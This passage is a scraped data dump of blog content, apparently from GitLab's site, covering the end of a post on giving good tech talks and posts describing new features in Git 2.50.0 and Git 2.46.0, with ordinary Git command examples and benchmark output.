will go in one ear and out of the other. And the story doesn't have to be complicated - a story is, after all, just a beginning, middle, and an end...maybe a conflict or two. But telling the story - showing how the technology or what you are presenting applies to real people in the real world - is critical to getting your point across.\n\nIt's so critical that some of the best tech talks are only stories. In the \"Reflections\" Keynote at KubeCon CloudNativeCon 2019, Kelsey Hightower - one of the most respected tech speakers known for his impressive and fun demos - didn't even appear to bring a laptop on stage. Speaking from the heart, Kelsey tells the stories of the early days of Kubernetes, of showing inclusion, of practicing intentional inclusion. And with those few simple but powerful stories, the audience is captivated and learns more in 15 minutes about what it means to be an inclusive open source community than they would have with hours of slides of fancy graphics and data.\n\n### More from Kelsey\n\n- [Kubernetes and the Path to Serverless](https://www.youtube.com/watch?v=oNa3xK2GFKY)\n- [Kelsey Hightower's Best Live Demo Yet](https://www.youtube.com/watch?v=U6SfRPwTKqo)\n- [TechExplorers: Kelsey Hightower](https://www.youtube.com/watch?v=9OHNejqXOoo)\n- [HashiConf 2017 Keynote](https://www.youtube.com/watch?v=v77FFbQwC6E)\n\n## Passion\n\n**[Zebras All the Way Down](https://www.youtube.com/watch?v=fE2KDzZaxvE): Bryan Cantrill, Uptime 2017**\n\nStories will help you make your talk more personal - both for you and the audience. But that won't carry much weight for long if you don't have passion for the stories and how they apply to the problem and solution you're trying to present. For the audience to stay engaged throughout the talk, they need to care about what you are talking about. And if it isn't clear from your speech, word choice, and energy that you are passionate about your topic, there is no way your audience will come along with you and care about what you have to say.\n\nNo one will ever accuse Bryan Cantrill of not being passionate. And in his talk \"Zebras All the Way Down,\" he brings that passion to advocating for one's own healthcare to understand at a deep level how our systems are impacted by the various layers of software. And that includes a lot of software we don't think about like that below the operating system. Turning a personal story about his physician father and his sister who had a rare condition into the way to think about solving hard debugging problems, Bryan brings the audience along. He makes you care about what he has to say...even if what he's talking about is far removed from your daily work.\n\n### More from Bryan\n\n- [Debugging Under Fire: Keep your Head when Systems have Lost their Mind](https://www.youtube.com/watch?v=30jNsCVLpAE)\n\n- [Corporate Open Source Anti-patterns](https://www.youtube.com/watch?v=Pm8P4oCIY3g)\n\n- [Fork Yeah! The Rise and Development of illumos](https://www.youtube.com/watch?v=-zRN7XLCRhc)\n\n## Connection to the audience\n\n**[Why Open Source Firmware is Important](https://www.youtube.com/watch?v=mUTx61t443A): Jessie Frazelle, GOTO 2019**\n\nOnce you've brought your whole self to the talk - your stories and your passion - you still need to ensure your audience will be engaged and want to hear about those things from you. To do that, you have to build a connection with your audience. The way to do this may seem simple on the surface, but it does actually take some effort. You need to understand at least two things about your audience: who they are and why they showed up to your talk.\n\nFirst - who is your audience? You have to understand who they are - what are their roles professionally? What is their experience like personally? What makes them passionate, and what are their stories? Understanding your audience will help you shape your talk to match their interests with your passions - a surefire method for success.\n\nSecond - why did they show up to your talk? You've already won a little bit here - they came to the conference or meetup, they saw your abstract and maybe a little bit about you, and chose to come to hear what you had to say. That should give you confidence that the audience wants you to succeed just as much as you want. Think for yourself: have you ever shown up to a tech talk hoping the speaker would bomb? Probably not. So that's half of the battle won already, but you can't take it for granted. They showed up expecting to learn or get something out of your talk. You need to think about how they apply what they want out of it and then deliver.\n\nA great example is Jessie Frazelle's talk at GOTO Chicago in 2019 on \"Open Source Firmware.\" On the surface, it might not seem like a great example - Jessie even has a disclaimer at the beginning of the talk. She's \"forcing\" an audience of software engineers to get a few rings lower than they are comfortable - down into the  UEFI kernel, management engine, and other low-level firmware pieces. But Jessie's passion for this part of the stack and showing the audience how it directly applies to how we all build software with many abstraction layers above the firmware is offered throughout the talk. Jessie convinces the audience to care about the software turtles all the way down. Along the way, she teaches about the stack of code we don't know about...and the rings of trust below \"0\" and the kernel.\n\n### More from Jessie\n\n- [Breaking Containers: Chaos Engineering and Kubernetes](https://www.youtube.com/watch?v=1hhVS4pdrrk)\n\n- [Benefits of isolation provided by containers](https://www.youtube.com/watch?v=fKDupfKu_Mw)\n\n- [Container Hacks and Fun Images](https://www.youtube.com/watch?v=cYsVvV1aVss)\n\n## Balance\n\n**[The Art of Code](https://www.youtube.com/watch?v=6avJHaC3C2U): Dylan Beattie, NDC London 2020**\n\nOnce you've got your audience bought in - and know what you're going to tell them and why - you've got to write the talk. Until now, not much has been focused on that. There are a lot of methods out there for outlining, writing, and structuring your speech. Far too many, in fact, for me to get into here. And that's not my goal - there is a one-size-fits-all method for creating a great tech talk. Much like many technical problems, the answer to \"how should I structure this thing\" is \"it depends.\" However, the best tech talks I've ever seen strike a balance - a balance of the tech and the stories, learning and entertainment, questions and answers.\n\nThis balance boils down to balancing the \"three S's of a great tech talk\":\n\n_Style_\n\n_Substance_\n\n_Stories_\n\nEven though one of these S's (stories) repeats one of our early items, I think that only serves to express how important it is to a great talk. You must tell a story. But unless you're giving a keynote at a conference where you're the most respected person in the room (shoutout to Kelsey Hightower), the stories won't always be the whole package. In most tech talks, folks are coming to learn something about technology or how humans interact with technology - so bringing substance is essential. You have to prove you know what you're talking about and that it matters to your audience.\n\nBut, as we've discussed already, that substance can't be just dry numbers on a chart or some other way to present cold unconnected data. While that is often the business of any serious engineering endeavor, a presentation on stage is more than that. You must also bring style - charisma, humor, fun visuals, and passion - all ways you can make sure style is balanced with the substance of your talk. Sure, some have a lot more style than others - but those with no style are the ones that are quickly forgotten.\n\nPerhaps one of the best speakers when it comes to this balance is Dylan Beattie. In \"The Art of Code,\" Dylan takes us through various elements - from maths to retro computing to programming Fizz Buzz as an 80's hair ballad, complete with guitar playing and singing from Dylan. However, Dylan balances the exciting talk style with the stories he wants the audience to hear. And he sprinkles in the substance about how we as technologists have a responsibility to the world...and need to not take ourselves too seriously.\n\n### More from Dylan\n\n- [Fractals, Factories and Fast Food](https://www.youtube.com/watch?v=Vs1DWYrw2Ps)\n\n- [Architecture: The Stuff That's Hard to Change](https://www.youtube.com/watch?v=3LtQWxhqjqI)\n\n- [Ctrl-Alt-Del: Learning to Love Legacy Code](https://www.youtube.com/watch?v=wPjHuvulivM)\n\n## Call to Action\n\n**[Why work doesn't happen at work](https://www.ted.com/talks/jason_fried_why_work_doesn_t_happen_at_work/transcript?language=en): Jason Fried, TEDx Midwest**\n\nThis last key - a meaningful call to action - is the one I struggled the most to name. As they say, there are only two hard things in software development: naming things, cache invalidation, and off-by-one errors. The connotation behind \"call to action\" may come off at first as sounding too \"sales and marketing\" like many software engineers. But that connotation does not impact the importance of a call to action. Using the strictest definition of the word, it is a vital part of your talk.\n\nAs we discussed, your audience came to your talk, hoping for you to succeed. They've now sat through you talking \"at\" them for 15, 25, 45 minutes or more. So the call to action is not for you - it's not self-serving like a sales pitch. Your call to action at the end of your talk should be your gift to the audience. It should be about them, not about you. It should give them concrete next steps they can take to positively impact what you were talking about in their own lives, organization, or world. This call to action is what you want the audience to remember, and the best tech talks are also the most memorable.\n\nAnd they don't have to be about tech at all even. In Jason Fried's TEDx talk \"Why work doesn't happen at work,\" Jason presents the main ideas around how we've become accustomed to working together are broken...and, more importantly, offers concrete ways to fix them. And while those calls to action are simple, they also go to the heart of Jason's story and passion: making it less crazy at work by freeing up people to do their best work with time and space.\n\n## What's next?\n\nSo, given that you've come this far, I hope I've shared my passion for great tech talks with you. Hopefully, that passion is shared, and you've found a new way of thinking about your own talks. So what is my gift to you for having come this far? Well, it's going to sound like an oversimplified call to action, but I'm telling you it's exactly what you should do:\n\n**Go give a talk!**\n\nYour unique stories are valuable. You are passionate about things that others should care more about. There are audiences out there - in meetups, small events, or large conferences  - that want to hear what you have to say and will be rooting for you when you get up in front of them. All that's left is to strike a balance between those stories and substance with some of your own personal style to make it exciting and engaging.\n\nSo go forth, and write that talk. I'm confident you can do it.\n",[1078,267,9],{"slug":5290,"featured":6,"template":689},"what-makes-a-great-tech-talk","content:en-us:blog:what-makes-a-great-tech-talk.yml","What Makes A Great Tech Talk","en-us/blog/what-makes-a-great-tech-talk.yml","en-us/blog/what-makes-a-great-tech-talk",{"_path":5296,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5297,"content":5300,"config":5308,"_id":5310,"_type":14,"title":5311,"_source":16,"_file":5312,"_stem":5313,"_extension":19},"/en-us/blog/what-s-new-in-git-2-50-0",{"noIndex":6,"title":5298,"description":5299},"What’s new in Git 2.50.0?","Here are contributions from GitLab's Git team and the Git community such as the git-diff-pairs(1) command and git-rev-list(1) option to perform batched reference updates.",{"title":5298,"description":5301,"authors":5302,"heroImage":5304,"body":5305,"date":5306,"category":10,"tags":5307},"Here are contributions from GitLab's Git team and the Git community such as the git-diff-pairs(1) command and git-update-ref(1) option to perform batched reference updates.",[5303],"Justin Tobler","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663087/Blog/Hero%20Images/git3-cover.png","The Git project recently released [Git Version 2.50.0](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/T/#u). Let's look at a few notable highlights from this release, which includes contributions from the Git team at GitLab and also the wider Git community.\n## New git-diff-pairs(1) command\n\nDiffs are at the heart of every code review and show all the changes made\nbetween two revisions. GitLab shows diffs in various places, but the most\ncommon place is a merge request's [\"Changes\" tab](https://docs.gitlab.com/user/project/merge_requests/changes/).\nBehind the scenes, diff generation is powered by\n[`git-diff(1)`](https://git-scm.com/docs/git-diff). For example:\n\n```shell\n$ git diff HEAD~1 HEAD\n```\n\nThis command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if\nthere were a way to break diff computation into smaller, more digestible chunks.\n\nOne way this can be achieved is by using\n[`git-diff-tree(1)`](https://git-scm.com/docs/git-diff-tree) to retrieve info\nabout all the changed files:\n\n```shell\n$ git diff-tree -r -M --abbrev HEAD~ HEAD\n:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc\n:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN\n```\n\nGit refers to this output as the [\"raw\" format](https://git-scm.com/docs/git-diff-tree#_raw_output_format).\nIn short, each line of output lists filepairs and the accompanying metadata\nabout what has changed between the start and end revisions. Compared to\ngenerating the \"patch\" output for large changes, this process is relatively\nquick and provides a summary of everything that changed. This command can optionally perform rename detection by  appending the `-M` flag to check if identified changes were due to a file rename.\n\nWith this information, we could use `git-diff(1)` to compute each of the\nfilepair diffs individually. For example, we can provide the blob IDs\ndirectly:\n\n```shell\n$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f\n```\n\nWe can repeat this process for each of the filepairs, but spinning up a\nseparate Git process for each individual file diff is not very efficient.\nFurthermore, when using blob IDs, the diff loses some contextual information\nsuch as the change status, and file modes which are stored in with the parent\ntree object. What we really want is a mechanism to feed \"raw\" filepair info and\ngenerate the corresponding patch output.\n\nWith the 2.50 release, Git has a new built-in command named\n[`git-diff-pairs(1)`](https://git-scm.com/docs/git-diff-pairs). This command\naccepts \"raw\" formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be\nused:\n\n```shell\n$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z\n```\n\nWhen used in this manner, the resulting output is identical to using `git-diff(1)`.\nBy having a separate command to generate patch output, the \"raw\" output from\n`git-diff-tree(1)` can be broken up into smaller batches of filepairs and fed to separate\n`git-diff-pairs(1)` processes. This solves the previously mentioned scalability\nconcern because diffs no longer have to be computed all at once. Future GitLab\nreleases could build upon this mechanism to improve diff\ngeneration performance, especially in cases where large change sets are\nconcerned. For more information on this change, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/).\n\n_This project was led by [Justin Tobler](https://gitlab.com/justintobler)._\n\n## Batched reference updates\n\nGit provides the [`git-update-ref(1)`](https://git-scm.com/docs/git-update-ref)\ncommand to perform reference updates. When used with the `--stdin` flag,\nmultiple reference updates can be batched together in a single transaction by\nspecifying instructions for each reference update to be performed on stdin.\nBulk updating references in this manner also provides atomic behavior whereby a\nsingle reference update failure results in an aborted transaction and no\nreferences being updated. Here is an example showcasing this behavior:\n\n```shell\n# Create repository with three empty commits and branch named \"foo\"\n$ git init\n$ git commit --allow-empty -m 1\n$ git commit --allow-empty -m 2\n$ git commit --allow-empty -m 3\n$ git branch foo\n\n# Print out the commit IDs\n$ git rev-list HEAD\ncf469bdf5436ea1ded57670b5f5a0797f72f1afc\n5a74cd330f04b96ce0666af89682d4d7580c354c\n5a6b339a8ebffde8c0590553045403dbda831518\n\n# Attempt to create a new reference and update existing reference in transaction.\n# Update is expected to fail because the specified old object ID doesn’t match.\n$ git update-ref --stdin \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nfatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c\n\n# The \"bar\" reference was not created.\n$ git switch bar\nfatal: invalid reference: bar\n```\n\nCompared to updating many references individually, updating in bulk is also\nmuch more efficient. While this works well, there might be certain\ncircumstances where it is okay for a subset of the requested reference updates\nto fail, but we still want to take advantage of the efficiency gains of bulk\nupdates.\n\nWith this release, `git-update-ref(1)` has the new `--batch-updates` option,\nwhich allows the updates to proceed even when one or more reference updates\nfails. In this mode, individual failures are reported in the following format:\n\n```text\nrejected SP (\u003Cold-oid> | \u003Cold-target>) SP (\u003Cnew-oid> | \u003Cnew-target>) SP \u003Crejection-reason> LF\n```\n\nThis allows successful reference updates to proceed while providing context to\nwhich updates were rejected and for what reason. Using the same example\nrepository from the previous example:\n\n```shell\n# Attempt to create a new reference and update existing reference in transaction.\n$ git update-ref --stdin --batch-updates \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nrejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided\n\n# The \"bar\" reference was created even though the update to \"foo\" was rejected.\n$ git switch bar\nSwitched to branch 'bar'\n```\n\nThis time, with the `--batch-updates` option, the reference creation succeeded\neven though the update didn't work. This patch series lays the groundwork for\nfuture performance improvements in `git-fetch(1)` and `git-receive-pack(1)`\nwhen references are updated in bulk. For more information, check the\n[mailing-list thread](https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/)\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## New filter option for git-cat-file(1)\n\nWith [`git-cat-file(1)`](https://git-scm.com/docs/git-cat-file), it is possible\nto print info for all objects contained in the repository via the\n`--batch–all-objects` option. For example:\n\n```shell\n# Setup simple repository.\n$ git init\n$ echo foo >foo\n$ git add foo\n$ git commit -m init\n\n# Create an unreachable object.\n$ git commit --amend --no-edit\n\n# Use git-cat-file(1) to print info about all objects including unreachable objects.\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ntree 205f6b799e7d5c2524468ca006a0131aa57ecce7\nblob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nIn some situations, a user might want to search through all objects in the\nrepository, but only output a subset based on some specified attribute. For\nexample, if we wanted to see only the objects that are commits, we could use\n`grep(1)`:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nWhile this works, one downside with filtering the output is that\n`git-cat-file(1)` still has to traverse all the objects in the repository, even\nthe ones that the user is not interested in. This can be rather inefficient.\n\nWith this release, `git-cat-file(1)` now has the `--filter` option, which only\nshows objects matching the specified criteria. This is similar to the option of\nthe same name for `git-rev-list(1)`, but with only a subset of the filters\nsupported. The supported filters are `blob:none`, `blob:limit=`, as well as\n`object:type=`. Similar to the previous example, objects can be filtered by\ntype with Git directly:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nNot only is it convenient for Git to handle the processing, for large\nrepositories with many objects, it is also potentially more efficient. If a\nrepository has bitmap indices, it becomes possible for Git to efficiently\nlookup objects of a specific type, and thus avoid scanning through the\npackfile, which leads to a significant speedup. Benchmarks conducted on the\n[Chromium repository](https://github.com/chromium/chromium.git) show\nsignificant improvements:\n\n```text\nBenchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]\n   Range (min … max):   73.936 s … 89.690 s    10 runs\n\nBenchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]\n   Range (min … max):    18.2 ms …  23.6 ms    127 runs\n\nBenchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]\n   Range (min … max):    1.541 s …  1.566 s    10 runs\n\nBenchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]\n   Range (min … max):   11.114 s … 11.245 s    10 runs\n\nBenchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]\n   Range (min … max):   62.836 s … 73.618 s    10 runs\n\nBenchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]\n   Range (min … max):   12.960 s … 13.199 s    10 runs\n\nSummary\n   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n```\n\nInterestingly, these results indicate that the computation time now scales with\nthe number of objects for a given type instead of the number of total objects\nin the packfile. The original mailing-list thread can be found\n[here](https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/).\n\n_This project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)._\n\n## Improved performance when generating bundles\n\nGit provides a means to generate an archive of a repository which contains a\nspecified set of references and accompanying reachable objects via the\n[`git-bundle(1)`](https://git-scm.com/docs/git-bundle) command. This operation\nis used by GitLab to generate repository backups and also as part of the\n[bundle-URI](https://git-scm.com/docs/bundle-uri) mechanism.\n\nFor large repositories containing millions of references, this operation can\ntake hours or even days. For example, with the main GitLab repository\n([gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab)), backup times were\naround 48 hours. Investigation revealed there was a performance bottleneck due\nto how Git was performing a check to avoid duplicated references being included\nin the bundle. The implementation used a nested `for` loop to iterate and\ncompare all listed references, leading to O(N^2) time complexity. This scales\nvery poorly as the number of references in a repository increases.\n\nIn this release, this issue was addressed by replacing the nested loops with a\nmap data structure leading to a significant speedup. The following benchmark\nthe performance improvement for creating a bundle with a repository containing\n100,000 references:\n\n```text\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s    10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]\n  Range (min … max):    2.364 s …  2.425 s    10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nTo learn more, check out our blog post\n[How we decreased GitLab repo backup times from 48 hours to 41 minutes](https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/).\nYou can also find the original mailing list thread\n[here](https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## Better bundle URI unbundling\n\nThrough the [bundle URI](https://git-scm.com/docs/bundle-uri) mechanism in Git,\nlocations to fetch bundles from can be provided to clients with the goal to\nhelp speed up clones and fetches. When a client downloads a bundle, references\nunder `refs/heads/*` are copied from the bundle into the repository along with\ntheir accompanying objects. A bundle might contain additional references\noutside of `refs/heads/*` such as `refs/tags/*`, which are simply ignored when\nusing bundle URI on clone.\n\nIn Git 2.50, this restriction is lifted, and all references\nmatching `refs/*` contained in the downloaded bundle are copied.\n[Scott Chacon](https://github.com/schacon), who contributed this functionality,\ndemonstrates the difference when cloning\n[gitlab-org/gitlab-foss](https://gitlab.com/gitlab-org/gitlab-foss):\n\n```shell\n$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49\nCloning into 'gl2.49'...\nremote: Enumerating objects: 1092703, done.\nremote: Counting objects: 100% (973405/973405), done.\nremote: Compressing objects: 100% (385827/385827), done.\nremote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)\nReceiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.\nResolving deltas: 100% (710976/710976), completed with 9081 local objects.\nChecking objects: 100% (4194304/4194304), done.\nChecking connectivity: 959668, done.\nUpdating files: 100% (59972/59972), done.\n\n$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50\nCloning into 'gl-2.50'...\nremote: Enumerating objects: 65538, done.\nremote: Counting objects: 100% (56054/56054), done.\nremote: Compressing objects: 100% (28950/28950), done.\nremote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)\nReceiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.\nResolving deltas: 100% (27401/27401), completed with 8564 local objects.\nUpdating files: 100% (59972/59972), done.\n```\n\nComparing these results, we see that Git 2.50 fetches 43,887 objects\n(40.42 MiB) after the bundle was extracted whereas Git 2.49 fetches a\ntotal of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer\nobjects and 90% less data, which benefits both the client and the server. The\nserver needs to process a lot less data to the client and the client needs to\ndownload and extract less data. In the example provided by Scott this led to a\nspeedup of 25%.\n\nTo learn more, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/).\n\n_This patch series was contributed by [Scott Chacon](https://github.com/schacon)._\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from\nthe [official release announcement](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/) of the Git project. Also, check\nout our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n","2025-06-16",[751,9,267],{"featured":91,"template":689,"slug":5309},"what-s-new-in-git-2-50-0","content:en-us:blog:what-s-new-in-git-2-50-0.yml","What S New In Git 2 50 0","en-us/blog/what-s-new-in-git-2-50-0.yml","en-us/blog/what-s-new-in-git-2-50-0",{"_path":5315,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5316,"content":5321,"config":5326,"_id":5328,"_type":14,"title":5329,"_source":16,"_file":5330,"_stem":5331,"_extension":19},"/en-us/blog/whats-new-in-git-2-46-0",{"title":5317,"description":5318,"ogTitle":5317,"ogDescription":5318,"noIndex":6,"ogImage":2047,"ogUrl":5319,"ogSiteName":673,"ogType":674,"canonicalUrls":5319,"schema":5320},"What’s new in Git 2.46.0?","Here are highlights of release contributions from GitLab's Git team and the wider Git community, including reference backend migration tooling and transactional symbolic reference updates.","https://about.gitlab.com/blog/whats-new-in-git-2-46-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What’s new in Git 2.46.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Justin Tobler\"}],\n        \"datePublished\": \"2024-07-29\",\n      }",{"title":5317,"description":5318,"authors":5322,"heroImage":2047,"date":5323,"body":5324,"category":10,"tags":5325},[5303],"2024-07-29","The Git project recently released [Git v2.46.0](https://lore.kernel.org/git/xmqqzfq0i0qa.fsf@gitster.g/T/#u). Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\n## Tooling to migrate reference backends\n\nIn the previous [Git 2.45.0](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.45.0.txt?ref_type=heads)\nrelease, the reftables format was introduced as a new backend for storing\nreferences. This new reference format solves some challenges that large\nrepositories face as the number of references scales. If you are not yet\nfamiliar with the reftables backend, check out our previous [Git release blog post](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) where the feature was introduced and our beginner’s guide to [learn more about how reftables work](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/).\n\nThe reftable backend has a different on-disk format than the pre-existing files backend. Consequently, to use reftables on an existing repository requires a conversion between the different formats. To accomplish this, a new git-refs(1) command has been introduced with the `migrate` subcommand to perform reference backend migrations. Below is an example of how this command can be used.\n\n```shell\n# Initialize a new repository as “bare” so it does not contain reflogs.\n$ git init --bare .\n$ git commit --allow-empty -m \"init\"\n# Populate repository with references in the files backend.\n$ git branch foo\n$ git branch bar\n$ tree .git/refs\n.git/refs\n├── heads\n│   ├── bar\n│   ├── foo\n│   ├── main\n└── tags\n# Perform reference migration to reftables format.\n$ git refs migrate --ref-format=reftable\n# Check that reftables backend is now in use.\n$ tree .git/reftable\n.git/reftable\n├── 0x000000000001-0x000000000001-a3451eed.ref\n└── tables.list\n# Check the repository config to see the updated `refstorage` format.\n$ cat config\n[core]\n        repositoryformatversion = 1\n        filemode = true\n        bare = true\n        ignorecase = true\n        precomposeunicode = true\n[extensions]\n        refstorage = reftable\n```\n\nOnce a repository has been migrated, the on-disk format is changed to begin\nusing the reftable backend. Git operations on the repository continue to\nfunction and interact with remotes the same as before. The migration only\naffects how references are stored internally for the repository. If you wish to go back to the files reference backend, you can accomplish this with the same command by instead specifying `--ref-format=files`.\n\nThe migration tooling currently has some notable limitations. The reflogs in a repository are a component of a reference backend and would also require\nmigration between formats. Unfortunately, the tooling is not yet capable of\nconverting reflogs between the files and reftables backends. Also, a repository with worktrees essentially has multiple ref stores and the migration tool is not yet capable of handling this scenario. Therefore, if a repository contains reflogs or worktrees, reference migration is currently unavailable. These limitations may be overcome in future versions.\n\nBecause a bare Git repository does not have reflogs, it is easier to migrate. To migrate a standard non-bare repository, reflogs must be pruned first. Therefore, any repository without reflogs or worktrees can be migrated. With these limitations in mind, this tool can be used to begin taking advantage of the reftables backend in your existing repositories.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Transactional symref updates\n\nThe [git-update-ref(1)](https://git-scm.com/docs/git-update-ref) command\nperforms reference updates in a Git repository. These reference updates can also be performed atomically in bulk with transactions by using\n`git update-ref --stdin` and passing update-ref instructions on stdin. Below is an example of how this is done.\n\n```shell\n$ git init .\n$ git branch -m main\n$ git commit --allow-empty -m \"foo\" && git commit --allow-empty -m \"bar\"\n# Retrieve the object ID of the two commits created.\n$ git rev-parse main~ main\n567aac2b3d1fbf0bd2433f669eb0b82a0348775e\n3b13462a9a42e0a3130b9cbc472ab479d3ef0631\n# Start transaction, provide update-ref instructions, and commit.\n$ git update-ref --stdin \u003C\u003CEOF\n> start\n> create refs/heads/new-ref 3b13462a9a42e0a3130b9cbc472ab479d3ef0631\n> update refs/heads/main 567aac2b3d1fbf0bd2433f669eb0b82a0348775e\n> commit\n> EOF\n$ git for-each-ref\n567aac2b3d1fbf0bd2433f669eb0b82a0348775e commit refs/heads/main\n3b13462a9a42e0a3130b9cbc472ab479d3ef0631 commit refs/heads/my-ref\n```\n\nFrom this example, once the transaction is committed, a new branch is created pointing to the “bar” commit and the main branch is updated to point to the previous “foo” commit. Committing the transaction performs the specified reference updates atomically. If an individual reference update fails, the transaction is aborted and no reference updates are performed.\n\nA notable absence here is instructions to support symref updates in these\ntransactions. If a user wants to update a symref along with other references\natomically in the same transaction, there is no tooling to do so. In this\nrelease, the `symref-create`, `symref-update`, `symref-delete`, and\n`symref-verify` instructions are introduced to provide this functionality.\n\n```shell\n# Create a symref that will be updated during the next operation.\n$ git symbolic-ref refs/heads/symref refs/heads/main\n# The --no-deref flag is required to ensure the symref itself is updated.\n$ git update-ref --stdin --no-deref \u003C\u003CEOF\n> start\n> symref-create refs/heads/new-symref refs/heads/main\n> symref-update refs/heads/symref refs/heads/new-ref\n> commit\n> EOF\n$ git symbolic-ref refs/heads/symref\nrefs/heads/new-ref\n$ git symbolic-ref refs/heads/new-symref\nrefs/heads/main\n```\n\nFrom the above example, a new symbolic reference is created 